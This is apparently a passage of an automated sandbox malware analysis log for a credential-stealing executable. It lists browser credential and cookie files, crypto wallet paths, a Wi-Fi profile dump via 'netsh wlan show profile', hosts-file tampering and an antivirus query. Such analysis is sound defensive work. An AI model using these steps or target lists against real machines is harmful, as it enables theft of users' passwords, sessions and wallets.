              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\BPMLNOBVSB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\BPMLNOBVSB.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\CURQNKVOIX.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\DVWHKMNFNN.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.pdf VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\tree.com | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\program.exe | Code function: 0_2_00007FF6B750D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6B750D010
              Source: C:\Users\user\Desktop\program.exe | Code function: 0_2_00007FF6B7525E7C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF6B7525E7C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe | Code function: 83_2_00007FF64FE948CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,83_2_00007FF64FE948CC
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              Source: C:\Users\user\Desktop\program.exe | File written: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: 00000001.00000003.2102475831.000001B5FEEF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.2105351723.000001B5FDA10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.1707785964.000002641A645000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.1707785964.000002641A643000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: program.exe PID: 7308, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: program.exe PID: 7324, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\_MEI73082\rarreg.key, type: DROPPED
              Source: Yara match | File source: Process Memory Space: program.exe PID: 7324, type: MEMORYSTR
              Source: program.exe, 00000001.00000003.1759907670.000001B5FE389000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets[
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: com.liberty.jaxx
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: exodus.wallet
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: Ethereum
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: keystore
              Source: C:\Users\user\Desktop\program.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\program.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
